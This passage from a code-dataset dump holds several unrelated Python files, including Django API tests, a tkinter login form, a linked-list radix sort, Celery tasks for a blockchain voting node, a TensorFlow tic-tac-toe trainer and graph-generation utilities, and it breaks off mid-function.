= \"2019-11-06T11:42:53.800762+00:00\"\n\n @override_settings(CELERY_TASK_ALWAYS_EAGER=True)\n def test_api(self):\n widget = models.Widget.objects.create(owner=self.user)\n\n response = self.client.get(\n reverse(\"api-widget:waypoint-list\", kwargs={\"widget_pk\": widget.pk})\n )\n self.assertEqual(response.status_code, 401, \"anonymous user can not view\")\n\n self.client.force_login(self.user)\n response = self.client.post(\n reverse(\"api-widget:waypoint-list\", kwargs={\"widget_pk\": widget.pk}),\n data={\"timestamp\": self.date, \"lat\": 1, \"lon\": 1, \"state\": \"waypoint\"},\n content_type=\"application/json\",\n )\n self.assertEqual(response.status_code, 201, \"can post sample\")\n\n response = self.client.get(\n reverse(\"api-widget:waypoint-list\", kwargs={\"widget_pk\": widget.pk})\n )\n data = response.json()\n self.assertEqual(data[\"count\"], 1, \"Found one waypoint\")\n\n @override_settings(CELERY_TASK_ALWAYS_EAGER=True)\n def test_owntracks_waypoints(self):\n tasks.owntracks_mqtt_waypoints(\n \"owntracks/WaypointTest/device/waypoints\",\n {\n \"_type\": \"waypoints\",\n \"waypoints\": [\n {\n \"_type\": \"waypoint\",\n \"tst\": 1560375712,\n \"lat\": 100.1,\n \"lon\": 100.1,\n \"rad\": 100,\n \"desc\": \"test-location\",\n }\n ],\n },\n )\n self.assertEqual(models.Widget.objects.count(), 1)\n\n @override_settings(CELERY_TASK_ALWAYS_EAGER=True)\n def test_owntracks_location(self):\n tasks.owntracks_mqtt_location(\n \"owntracks/WaypointTest/device\",\n {\n \"batt\": 100,\n \"lon\": 100.3543190608404,\n \"acc\": 65,\n \"p\": 102.1,\n \"bs\": 3,\n \"vac\": 10,\n \"lat\": 100.1,\n \"inregions\": [\"test-location\"],\n \"t\": \"u\",\n \"conn\": \"w\",\n \"tst\": 1571049037,\n \"alt\": 12,\n \"_type\": \"location\",\n \"tid\": \"PR\",\n },\n )\n self.assertEqual(models.Widget.objects.count(), 1)\n self.assertEqual(models.Waypoint.objects.count(), 1)\n self.assertEqual(models.Setting.objects.count(), 1)\n","sub_path":"quickstats/tests/test_waypoints.py","file_name":"test_waypoints.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"339557923","text":"from tkinter import ttk\nfrom StandardValues import *\n\n\nclass Login:\n def __init__(self, debug):\n self.debug = debug\n\n self.username = \"\"\n self.password = \"\"\n\n self.root = Tk()\n self.root.withdraw()\n\n self.login_scrn = None\n\n self.username_label = None\n self.username_tb = None\n\n self.pw_label = None\n self.pw_tb = None\n\n self.submit_btn = None\n self.exit_btn = None\n\n self.create_window()\n\n def login(self):\n self.username = self.username_tb.get()\n self.password = self.pw_tb.get()\n\n def create_window(self):\n # set login screen\n self.login_scrn = Toplevel()\n self.login_scrn.configure(background=StandardValues.background)\n self.login_scrn.winfo_toplevel().title(\"User Login\")\n\n StandardValues.get_screen_position(self.root)\n\n # Positions the window in the center of the page.\n self.login_scrn.geometry(\"+{}+{}\".format(StandardValues.scr_width, StandardValues.scr_height))\n self.create_buttons()\n\n def create_buttons(self):\n # set username and pw text boxes and labels\n self.username_label = Label(self.login_scrn, bg=\"white\", text=\"User Name\")\n self.username_label.grid(row=0, column=0)\n\n self.username_tb = Entry(self.login_scrn)\n self.username_tb.insert(END, \"\")\n self.username_tb.bind('', self.submit)\n self.username_tb.grid(row=0, column=1, padx=20)\n\n self.pw_label = Label(self.login_scrn, bg=\"white\", text=\"Password\")\n self.pw_label.grid(row=1, column=0)\n\n self.pw_tb = Entry(self.login_scrn)\n self.pw_tb.insert(END, \"\")\n self.pw_tb.bind('', self.submit)\n self.pw_tb.grid(row=1, column=1, padx=20)\n\n self.create_submit(self.username_tb, self.pw_tb)\n # self.create_exit()\n\n\n def create_submit(self, username_textbox, pw_textbox):\n var = IntVar()\n self.submit_btn = Button(self.login_scrn,\n text=\"Submit\")\n self.submit_btn.config(command=lambda: {var.set(1),\n self.login(),\n self.login_scrn.destroy()})\n\n self.submit_btn.grid(row=0, column=2, padx=15)\n self.submit_btn.bind('', self.submit)\n\n if self.debug:\n username_textbox.insert(END, \"TESTUSER\")\n pw_textbox.insert(END, \"TESTUSER\")\n self.click_submit()\n else:\n self.submit_btn.wait_variable(var)\n\n # def create_exit(self):\n # var = IntVar()\n # self.exit_btn = ttk.Button(self.login_scrn,\n # text=\"Exit\",\n # command=lambda: {var.set(1), self.login_scrn.destroy()})\n # self.exit_btn.grid(row=1, column=2, padx=15)\n # self.exit_btn.bind('', self.exit)\n # self.exit_btn.wait_variable(var)\n\n def exit(self, event):\n self.exit_btn.invoke()\n\n def submit(self, event):\n self.submit_btn.invoke()\n\n def click_submit(self):\n self.submit_btn.invoke()\n","sub_path":"src/app/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255256967","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.previous = None\n self.next = None\n\n def __str__(self):\n return str(self.data)\n\n\nclass LinkedList:\n def __init__(self):\n self.head = self.tail = None\n self.sizes = 0\n\n def __str__(self):\n if not self.isEmpty():\n cur = self.head\n s = \"\"\n while cur.next != None:\n s += str(cur.data) + ' -> '\n cur = cur.next\n s += str(cur.data)\n return s\n else:\n return ''\n\n def str_without(self):\n if not self.isEmpty():\n cur = self.head\n s = \"\"\n while cur.next != None:\n s += str(cur.data) + ' '\n cur = cur.next\n s += str(cur.data)\n return s\n else:\n return ''\n\n def reverse(self):\n if self.isEmpty():\n return \"Empty\"\n cur, s = self.tail, \" \"\n while cur.previous != None:\n s += str(cur.data) + \" \"\n cur = cur.previous\n s += str(cur.data)\n return s\n\n def isEmpty(self):\n return self.sizes == 0\n\n def size(self):\n return self.sizes\n\n def append(self, data):\n if self.head == None:\n self.head = self.tail = Node(data)\n else:\n t = Node(data)\n t.previous = self.tail\n t.next = self.tail.next\n self.tail.next = t\n self.tail = t\n self.sizes += 1\n\n def addHead(self, data):\n if self.head == None:\n self.head = self.tail = Node(data)\n else:\n t = Node(data)\n t.next = self.head\n t.previous = self.head.previous\n self.head.previous = t\n self.head = t\n self.sizes += 1\n\n def insert(self, index, data):\n if index == 0 or index < -1*self.sizes:\n self.addHead(data)\n elif index > self.sizes - 1:\n self.append(data)\n else:\n if index < 0:\n index = self.sizes + index\n q = Node(data)\n p = self.head\n for i in range(index - 1):\n p = p.next\n q.next = p.next\n q.previous = p\n p.next.previous = q\n p.next = q\n self.sizes += 1\n\n def search(self, data):\n cur = self.head\n while cur != None:\n if cur.data == data:\n return True\n cur = cur.next\n return False\n\n def index(self, data):\n p = self.head\n i = 0\n while p != None:\n if p.data == data:\n return i\n i += 1\n p = p.next\n return -1\n\n def pop(self, index=None):\n if index == 0 or index == -1*self.sizes:\n self.head.next.previous = self.head.previous\n self.head = self.head.next\n elif index == None or index == -1 or index == self.sizes - 1:\n self.tail.previous.next = self.tail.next\n self.tail = self.tail.previous\n\n else:\n cur = self.head\n for i in range(index - 1):\n cur = cur.next\n if cur.next.next != None:\n cur.next.next.previous = cur\n cur.next = cur.next.next\n self.sizes -= 1\n\n\ndef RadixSort(L=LinkedList()):\n before_sort, after_sort = L, LinkedList()\n roundtake = 1\n cur = before_sort.head\n q = -1\n while True:\n print('------------------------------------------------------------')\n print(f'Round : {roundtake}')\n for j in range(10):\n print(f'{j} : ', end='')\n m = LinkedList()\n t = before_sort.head\n while t != None:\n w = len(t.data)\n if '-' in t.data:\n w -= 1\n if (q < -w and j == 0):\n if m.size() == 0:\n m.append(t.data)\n else:\n if int(m.tail.data) >= int(t.data) >= int(m.head.data):\n a = m.head\n ind = 0\n while a != None:\n if int(a.data) >= int(t.data):\n m.insert(ind, t.data)\n break\n ind += 1\n a = a.next\n elif int(m.head.data) > int(t.data):\n m.addHead(t.data)\n elif int(m.tail.data) < int(t.data):\n m.append(t.data)\n if q >= -w:\n if t.data[q] == str(j):\n if m.size() == 0:\n m.append(t.data)\n else:\n if int(m.tail.data) >= int(t.data) >= int(m.head.data):\n a = m.head\n ind = 0\n while a != None:\n if int(a.data) >= int(t.data):\n m.insert(ind, t.data)\n break\n ind += 1\n a = a.next\n elif int(m.head.data) > int(t.data):\n m.addHead(t.data)\n elif int(m.tail.data) < int(t.data):\n m.append(t.data)\n t = t.next\n print(m.str_without())\n if m.size() == before_sort.size() and j == 0:\n after_sort = m\n if before_sort.size() == after_sort.size():\n break\n roundtake += 1\n q -= 1\n print('------------------------------------------------------------')\n print(f'{roundtake - 1} Time(s)')\n print(f'Before Radix Sort : {before_sort}')\n print(f'After Radix Sort : {after_sort}')\n L = after_sort\n\n\ninp = input(\"Enter Input : \").split()\nL = LinkedList()\nfor i in inp:\n L.append(i)\nRadixSort(L)\n","sub_path":"DataStructure-Python/Link List/Radix Sort.py","file_name":"Radix Sort.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"92897509","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('register', '0007_horario_turma'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='turma',\n name='ano_letivo',\n field=models.CharField(max_length=4, verbose_name=b'Ano Letivo'),\n ),\n ]\n","sub_path":"onda_esportiva/register/migrations/0008_auto_20170408_1917.py","file_name":"0008_auto_20170408_1917.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"295408536","text":"from __future__ import absolute_import\nfrom nodeProject.nodeApp import services\nfrom nodeProject.nodeApp.models import Seeder, Block, Vote\nfrom nodeProject.nodeApp.serializers import VoteSerializer\nfrom nodeProject.nodeApp.services import getLongestBlockchain\nfrom nodeProject.nodeApp.utilities import concatenate, encryptSha256, dateToString, stringToDate\nfrom nodeProject.blockchainReusableApp.utilities import verifySignature\nfrom django.utils import timezone\nfrom celery import shared_task\nfrom celery import task\nimport requests\nimport logging\nimport json\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n# Broadcast dos votos\n@shared_task\ndef broadcastVote(vote, myIp, myPort):\n\n # Broadcast do voto para os nodes conhecidos\n for node in Seeder.objects.all():\n\n # Link das apis rest dos nodes conhecidos\n url = 'http://'+ node.ip + ':' + str(node.port) + '/blockchain/vote/'\n\n # Garantindo que um node não envie voto para ele mesmo\n #\n # Para isso, ou a primeira parte do ip é diferente,\n # Ou a porta é diferente\n if(node.ip.split('.')[0] != myIp.split('.')[0] or str(node.port) != myPort):\n try:\n # Envio de uma requisição que envia o voto para a url definida\n jsonResponse = requests.post(url, data=vote, timeout=5)\n logger.info(\"Pra essa url: \" + url + \" funcionou\")\n # Caso algum erro de conexão aconteça\n except:\n logger.info(\"Pra essa url: \" + url + \" não funcionou\")\n else:\n logger.info(\"Uma tentativa de autoconexão foi feita para a url: \" + url)\n\n# Mineração do bloco\n@shared_task\ndef proofOfWork(blockId):\n\n # Busca pelo objeto\n block = Block.objects.get(index=blockId)\n\n # Construindo uma string de zeros do tamanho da dificuldade da blockchain\n difficulty = block.difficulty\n target = \"0\" * difficulty\n\n # Cópia do hash e do nonce do bloco atual\n # para serem realizados cálculos em memória,\n # impedindo a perda de desempenho que haveria\n # ao ficar atualizando os dados diretamente no banco\n currentHash = block.currentBlockHash\n currentNonce = 0\n\n # Enquanto os 'n = difficulty' primeiros caracteres\n # do hash atual não forem iguais a zero,\n # incrementar o nonce e recalcular o hash\n while(currentHash[:difficulty] != target):\n # Atualização dos dados em memória\n currentNonce = currentNonce + 1\n currentTimestamp = timezone.now()\n currentHash = encryptSha256(\n concatenate(\n [\n block.index,\n dateToString(currentTimestamp),\n block.votes,\n block.difficulty,\n currentNonce,\n block.previousBlockHash\n ]\n )\n )\n block.nonce = currentNonce\n block.timestamp = currentTimestamp\n block.currentBlockHash = currentHash\n block.save()\n\n@shared_task(name=\"mine_new_block\")\ndef mineNewBlock():\n\n # Verifique qual o node conhecido com mais blocos\n biggestNodeId, biggestNodeLength = getLongestBlockchain()\n\n # Tamanho da cadeia de blocos do próprio node\n myLength = Block.objects.count()\n\n # Caso nenhum node conhecido tenha mais blocos do que o próprio node\n if(biggestNodeId==0):\n logger.info(\"O node atual já possui a maior cadeia de blocos dentre todos os nodes conhecidos!\")\n\n # Caso contrário\n else:\n\n # Node conhecido com a maior cadeia de blocos\n biggestNode = Seeder.objects.get(id=biggestNodeId)\n\n # Caso a diferença seja apenas de um bloco, baixe apenas o último bloco válido do node\n if((biggestNodeLength - myLength) == 1 and services.getBlockchainSyncStatus()=='Válida'):\n\n # Guarde os dados do bloco\n block = requests.get(\"http://\" + biggestNode.ip + \":\" + str(biggestNode.port) + \"/blockchain/lastValidBlock\").json()\n\n # Salve todos os votos\n for vote in block['votes']:\n newVote = Vote(\n voterPubKey = vote['voterPubKey'],\n candidateRole = vote['candidateRole'],\n voterDocument = vote['voterDocument'],\n candidateNumber = vote['candidateNumber'],\n digitalSignature = vote['digitalSignature']\n )\n newVote.save()\n\n logger.info(\"Copiado o último bloco válido de \" + biggestNode.ip + \":\" + str(biggestNode.port))\n\n # Caso a diferença seja de mais de um bloco, baixe a cadeia inteira\n elif((biggestNodeLength - myLength) > 1 or services.getBlockchainSyncStatus()=='Inválida'):\n\n # Remova todos os blocos\n Block.objects.all().delete()\n # Remova todos os votos\n Vote.objects.all().delete()\n\n # Sincronize todos os dados com o node conhecido\n blocks = requests.get(\"http://\" + biggestNode.ip + \":\" + str(biggestNode.port) + \"/blockchain/syncBlocks\").json()\n\n # Para cada bloco\n for block in blocks:\n\n # Atribua os mesmos dados ao bloco e salve-o\n newBlock = Block(\n index = block['index'],\n timestamp = stringToDate(block['timestamp']),\n votes = json.dumps(block['votes'], indent=3, ensure_ascii=False),\n difficulty = block['difficulty'],\n nonce = block['nonce'],\n previousBlockHash = block['previousBlockHash'],\n currentBlockHash = block['currentBlockHash']\n )\n newBlock.save()\n\n # Para cada voto\n for vote in block['votes']:\n\n # Atribua os mesmos dados ao voto e salve-o\n newVote = Vote(\n voterPubKey = vote['voterPubKey'],\n candidateRole = vote['candidateRole'],\n voterDocument = vote['voterDocument'],\n candidateNumber = vote['candidateNumber'],\n digitalSignature = vote['digitalSignature'],\n block_id = newBlock.id\n )\n newVote.save()\n\n logger.info(\"Copiada a cadeia de blocos inteira de \" + biggestNode.ip + \":\" + str(biggestNode.port))\n\n\n # Só adiciona novos blocos, se o último já tiver sido validado\n if(services.getBlockchainSyncStatus() == \"Válida\"):\n\n # Lista de votos extras que um usuário possui\n extraVotes = []\n\n for vote in Vote.objects.all():\n message = vote.getCandidate() + \":\" + vote.voterDocument\n # Remove os votos que não possuem assinatura válida\n if(not verifySignature(vote.digitalSignature, message , vote.voterPubKey)):\n print(\"O voto \" + str(vote.id) + \" foi removido\")\n Vote.objects.filter(id=vote.id).delete()\n # Busca por votos que possuem o mesmo cargo e o mesmo título\n if(len(Vote.getVotesOnRoleByVoterDocument(vote.voterDocument, vote.candidateRole))>1):\n # Caso o voto ainda não esteja na lista, adicione-o\n if(extraVotes.count([vote.voterDocument, vote.candidateRole])==0):\n extraVotes.append([vote.voterDocument, vote.candidateRole])\n\n # Remove os votos extras que algum usuário possa ter feito em um dado cargo\n for voterDocument, candidateRole in extraVotes:\n # Busca todos os votos extras do mesmo usuario no mesmo cargo\n votes = Vote.getVotesOnRoleByVoterDocument(voterDocument, candidateRole)\n # Percorre-os\n for vote in votes :\n # Caso ele não seja o primeiro, apague-o\n if(vote.id is not Vote.getFirstVoteOnRoleByVoterDocument(voterDocument, candidateRole)):\n Vote.objects.filter(id=vote.id).delete()\n\n # Votos que serão atribuídos ao novo bloco\n votes = Vote.objects.filter(block_id=None)[0:5]\n\n # Caso a lista de votos não esteja vazia\n if(votes):\n\n # Índice do novo bloco\n # Começa com 1\n index = Block.objects.count() + 1\n\n # Serialização dos votos\n serializedVotes = VoteSerializer(votes, many=True)\n\n # Conversão dos votos serializados em string\n deserializedVotes = json.dumps(serializedVotes.data, indent=3, ensure_ascii=False)\n\n # Caso o bloco adicionado seja o bloco genesis\n if(index == 1):\n previousBlockHash = \"0\" * 64\n # Caso contrário\n else:\n # Recupere o hash atual do último bloco da blockchain\n previousBlockHash = Block.objects.order_by('-pk')[0].currentBlockHash\n\n # Incrementador inicial utilizado na mineração do bloco\n nonce = 0\n\n # Dificuldade do bloco\n difficulty = services.getCurrentDifficulty()\n\n # Data e hora da criação do bloco\n timestamp = timezone.now()\n\n # Criação de um novo objeto do tipo Bloco,\n # passando apenas os votos e o hash anterior\n newBlock = Block(\n index = index,\n timestamp = timestamp,\n votes = deserializedVotes,\n difficulty = difficulty,\n nonce = nonce,\n previousBlockHash = previousBlockHash\n )\n\n # Commit no banco\n newBlock.save()\n # Chamada da task assíncrona do \"PoW\"\n proofOfWork.delay(index)\n\n # Atribuição do bloco atual aos votos utilizados\n for vote in votes:\n vote.block = newBlock\n vote.save()\n","sub_path":"votechainNode/nodeProject/nodeApp/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":9942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"268035733","text":"import pygame\n\n\nclass Block(pygame.sprite.Sprite):\n\n def __init__(self, x, y, width, height, pic, border=False):\n '''Initialize the Block instance\n\n Parameters:\n x,y : position of the block\n width, height: size of the block\n pic: picture for the block\n border: Is the block used as border of the screen ? (default = No)\n '''\n\n # Call the parent class\n pygame.sprite.Sprite.__init__(self)\n\n if border is False:\n self.image = pic\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n elif border is True:\n self.image = pygame.Surface([width, height])\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n","sub_path":"classes/block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"166779831","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, timedelta\n\nfrom django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\nfrom alamo.api.models import ServiceResult, CheckResults\n\n\nclass CheckApiTestCase(APITestCase):\n def setUp(self):\n self.check_uuid = 'e2e1ec23-707a-4382-a956-f0cf3276a1b8'\n self.trigger_uuid = 'bd69fcab-5424-44a8-9ac8-24d2c46ec3b8'\n self.service_id = '999'\n now = datetime.now()\n one_minute_ago = now - timedelta(minutes=1)\n two_minutes_ago = now - timedelta(minutes=2)\n ok, fail, unknown = 0, 1, 2\n results = zip(\n [two_minutes_ago, one_minute_ago, now], [unknown, fail, ok]\n )\n for scheduled, result in results:\n kw = dict(\n check_uuid=self.check_uuid,\n trigger_uuid=self.trigger_uuid,\n alert_sent=False,\n status=result, meta={},\n scheduled_time=scheduled,\n execution_time=scheduled,\n insertion_time=scheduled,\n message='', service_id=self.service_id,\n )\n self.result = ServiceResult(**kw)\n self.check_result = CheckResults(**kw)\n self.check_result.save()\n self.result.save()\n\n def tearDown(self):\n ServiceResult.objects.filter(service_id=self.service_id,\n check_uuid=self.check_uuid).delete()\n CheckResults.objects.filter(check_uuid=self.check_uuid,\n trigger_uuid=self.trigger_uuid).delete()\n\n def test_service_result_count(self):\n count = ServiceResult.objects.count()\n self.assertEqual(count, 3)\n\n def test_check_result_count(self):\n count = CheckResults.objects.count()\n self.assertEqual(count, 3)\n\n def test_check_result_list_endpoint(self):\n detail_url = reverse('api-checkresults-list')\n response = self.client.get(detail_url, format='json')\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data, {})\n\n def test_service_result_endpoint(self):\n detail_url = reverse('api-checkresults-multiple')\n response = self.client.post(\n detail_url,\n data={'service_id': self.result.service_id,\n 'checks': [str(self.result.check_uuid)]},\n format='json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 3)\n self.assertEqual(\n len(response.data['results'][self.check_uuid]), 3\n )\n\n def test_check_detail_endpoint(self):\n fields = {'check_uuid', 'insertion_time', 'message', 'meta',\n 'scheduled_time', 'service_id',\n 'status', 'trigger_uuid'}\n detail_url = reverse(\n 'api-checkresults-detail', kwargs={'check_uuid': self.check_uuid}\n )\n response = self.client.get(\n detail_url, data={'triggers': self.trigger_uuid}, format='json'\n )\n\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data['count'], 3)\n for result in response.data['results']:\n for field in fields:\n self.assertIn(field, result)\n\n def test_check_detail_bad_params(self):\n detail_url = reverse(\n 'api-checkresults-detail', kwargs={'check_uuid': self.check_uuid}\n )\n response = self.client.get(detail_url, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n","sub_path":"alamo/api/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":3676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"625292231","text":"import tensorflow as tf\nimport numpy as np\nimport random as rand\nimport game\n\nNUM_ACTIONS = 18\nNUM_STATES = 90\nGAMMA = 0.2\n\nNUM_TRAINING_GAMES = 10000\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\ndef conv2d(x, W):\n return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')\n\ndef max_pool_2x2(x):\n return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],\n strides=[1, 2, 2, 1], padding='SAME')\n\ndef CreateNetwork():\n input_layer = tf.placeholder(\"float\", [None, NUM_STATES])\n layer_weights = weight_variable([NUM_STATES,50])\n bias = bias_variable([50])\n \n hidden_layer = tf.nn.relu(tf.matmul(input_layer, layer_weights) + bias)\n\n #drop_hidden_layer = tf.nn.dropout(hidden_layer, keep_prob=0.9)\n\n layer2_weights = weight_variable([50,25])\n bias2 = bias_variable([25])\n hidden_layer2 = tf.nn.relu(tf.matmul(hidden_layer, layer2_weights) + bias2)\n\n layer3_weights = weight_variable([25,18])\n bias3 = bias_variable([18])\n hidden_layer3 = tf.nn.relu(tf.matmul(hidden_layer2, layer3_weights) + bias3)\n\n layer4_weights = weight_variable([18,NUM_ACTIONS])\n bias4 = bias_variable([NUM_ACTIONS])\n\n output_layer = tf.nn.softmax(tf.matmul(hidden_layer3, layer4_weights) + bias4)\n return input_layer, output_layer\n\ndef CurrentState():\n # Check the results of training.\n test_board = [np.zeros(90).tolist()]\n\n test_reward = session.run(output_layer_, feed_dict={input_layer_ : test_board})[0]\n print(np.reshape(test_reward[:9],(3,3)))\n input(\"enter\")\n\ndef TrainModel():\n# Number of games to play\n states = []\n actions = []\n rewards = []\n for i in range(NUM_TRAINING_GAMES):\n PlayGame(states, actions, rewards)\n if i % 1000 == 1:\n # train\n print(len(states))\n print(len(actions))\n print(len(rewards))\n session.run(train_operation, feed_dict={input_layer_: states, tf_actions: actions, targets: rewards})\n states = []\n actions = []\n rewards = []\n CurrentState()\n\ndef PlayGame(states, actions, rewards):\n game.CreateBoard()\n\n while True:\n # look at possible moves\n for action in game.PossibleMoves(board):\n new_board = game = UpdateBoard(board, action)\n action_reward = session.run(output_layer_, feed_dict={input_layer_ : new_board})[0]\n \n reward_score = game.MoveScore(board, action) + GAMMA * np.max(action_reward)\n if reward_score == 1:\n reward_score[-1] = -1\n\n print(\"board\")\n print(np.reshape(board[:81], (9,9)))\n print(\"action\")\n print(np.reshape(action[:9], (3,3)))\n print(\"reward\")\n action_reward_score = np.max(action_reward)\n print(reward_score)\n print(action_reward_score)\n input(\"enter\")\n\n states.append(board)\n actions.append(action)\n rewards.append(reward_score)\n result, board = UpdateBoard(board)\n if not result: break\n\n\ndef UpdateBoard(board):\n assert(len(board) == 90), print(board)\n valid_moves = game.PossibleValidMoves(board)\n if (len(valid_moves) == 0): return False, None\n chosen_move = rand.choice(valid_moves)\n if game.MoveScore(board, chosen_move) == 1: return False, None\n board = [board[x] + chosen_move[x] for x in range(len(board))]\n board = game.SwitchPlayer(board)\n return True, board\n\nsession = tf.Session()\ninput_layer_, output_layer_ = CreateNetwork()\n\ntf_actions = tf.placeholder(\"float\", [None, NUM_ACTIONS])\ntargets = tf.placeholder(\"float\", [None])\nreadout_action = tf.reduce_sum(tf.mul(output_layer_, tf_actions), reduction_indices = 1)\n\ncost = tf.reduce_mean(tf.square(targets - readout_action))\ncost = tf.Print(cost, [cost], message=\"This is cost: \") \ntrain_operation = tf.train.AdamOptimizer(0.1).minimize(cost)\n\nsession.run(tf.initialize_all_variables())\nTrainModel()\nprint(\"Done training\")\n","sub_path":"super-tic-tac-toe/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"566400579","text":"#%%\nimport numpy as np\nimport pandas as pd\nimport os\nfrom IPython.display import display, HTML\nimport matplotlib as mlp\nimport seaborn as sns\nimport simplejson\nimport json\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom collections import Counter\nfrom sklearn.decomposition import PCA\n\nfilepath = os.getcwd() + '\\\\IntroDS\\\\week1\\\\'\n\n\ndef dummy_fun(doc):\n return doc\n\ntokenize = lambda doc: doc.lower().split(\" \")\n\npos = pd.read_csv(filepath +'pos.txt')\nneg = pd.read_csv(filepath +'neg.txt')\n\ndef commonWords(file, amount):\n return pd.Series(' '.join(file).split()).value_counts()[:amount]\n\nwith open(filepath +'neg.txt') as input_file:\n #build a counter from each word in the file\n count = Counter(word for line in input_file\n for word in line.split())\n\nneg_words = count.most_common(10)\n\nwith open(filepath +'pos.txt') as input_file:\n #build a counter from each word in the file\n count = Counter(word for line in input_file\n for word in line.split())\n\n\npos_words = count.most_common(10)\n\n\nprint('pos top10 \\n', pos_words)\nprint('neg top10 \\n', neg_words)\n\nvectorizerX = TfidfVectorizer()\nX = vectorizerX.fit_transform(pos)\nprint(X.shape)\n\npca = PCA(n_components=2).fit(X.toarray())\ndata2D = pca.transform(X)\nplt.scatter(data2D[:,0], data2D[:,1], c=data.target)\nplt.show()\n\nY = vectorizerY.fit_transform(neg)\nfitted_neg = vectorizerY.fit(neg)\n\nprint('positive vocab: ', vectorizerX.vocabulary_)\nprint('negative vocab: ', vectorizerY.vocabulary_)","sub_path":"IntroDS/week2/textthings.py","file_name":"textthings.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"87593904","text":"import networkx\nimport math\nimport scipy.optimize\nimport numpy\nimport sys\nfrom scipy import linalg\nimport matplotlib.pyplot as plt\nfrom IPython.display import Image\nimport pywt\nimport scipy.fftpack\nimport random\nimport operator\nimport copy\nfrom collections import deque\nfrom sklearn.preprocessing import normalize\nfrom sklearn.cluster import SpectralClustering\n\nimport random\n\ndef synthetic_graph(size, num_edges, sparsity, energy, balance, noise):\n\tsize_part_a = int(math.ceil(float(size * balance) / 2))\n\tsize_part_b = size - size_part_a\n\tF = []\n\tedges = {}\n \n\tavg_a = float(numpy.sqrt(float(energy * size) / (size_part_a * size_part_b))) / 2.\n \n\tavg_b = -float(numpy.sqrt(float(energy * size) / (size_part_a * size_part_b))) / 2.\n \n\tfor v in range(size):\n\t\tif v < size_part_a:\n\t\t\tF.append(random.gauss(avg_a, noise*avg_a))\n\t\telse:\n\t\t\tF.append(random.gauss(avg_b, noise*avg_a))\n \n\tG = networkx.Graph()\n \n\tfor v in range(size-1):\n\t\tG.add_edge(v,v+1)\n\t\tedges[(v,v+1)] = True\n \n\tremaining_edges = num_edges - len(G.edges())\n\tedges_accross = int((size_part_a * size_part_b * (1.-sparsity) * remaining_edges) / (size * (size-1)))\n\tedges_within = remaining_edges - edges_accross\n \n\tfor e in range(edges_accross):\n\t\tv1 = random.randint(0, size_part_a-1)\n\t\tv2 = random.randint(size_part_a, size-1)\n \n\t\twhile (v1,v2) in edges or v1 == v2:\n\t\t\tv1 = random.randint(0,size_part_a-1)\n\t\t\tv2 = random.randint(size_part_a, size_part_a+size_part_b-1)\n \n\t\tG.add_edge(v1,v2)\n\t\tedges[(v1,v2)] = True\n \n\tfor e in range(edges_within):\n\t\tv1 = random.randint(0,size-1)\n\t\tv2 = random.randint(0,size-1)\n \n\t\tif v1 > v2:\n\t\t\ttmp = v1\n\t\t\tv1 = v2\n\t\t\tv2 = tmp\n \n\t\twhile (v1,v2) in edges or v1 == v2 or (v1 < size_part_a and v2 >= size_part_a) or (v1 >= size_part_a and v2 < size_part_a):\n\t\t\tv1 = random.randint(0,size-1)\n\t\t\tv2 = random.randint(0,size-1)\n \n\t\t\tif v1 > v2:\n\t\t\t\ttmp = v1\n\t\t\t\tv1 = v2\n\t\t\t\tv2 = tmp\n \n\t\tG.add_edge(v1,v2)\n\t\tedges[(v1,v2)] = True\n \n\treturn G, numpy.array(F), edges_accross+1\n\ndef compute_distances(center, graph):\n\tdistances = networkx.shortest_path_length(graph, center)\n \n\treturn distances\n\ndef compute_embedding(distances, radius, graph):\n\tB = []\n\ts = 0\n\tnodes = {}\n\tfor v in graph.nodes():\n\t\tif distances[v] <= radius:\n\t\t\tB.append(1)\n\t\t\ts = s + 1\n\t\telse:\n\t\t\tB.append(0)\n \n\treturn numpy.array(B)\n\ndef generate_dyn_cascade(G, diam, duration, n):\n\tFs = []\n \n\tfor j in range(n):\n\t\tv = random.randint(0, 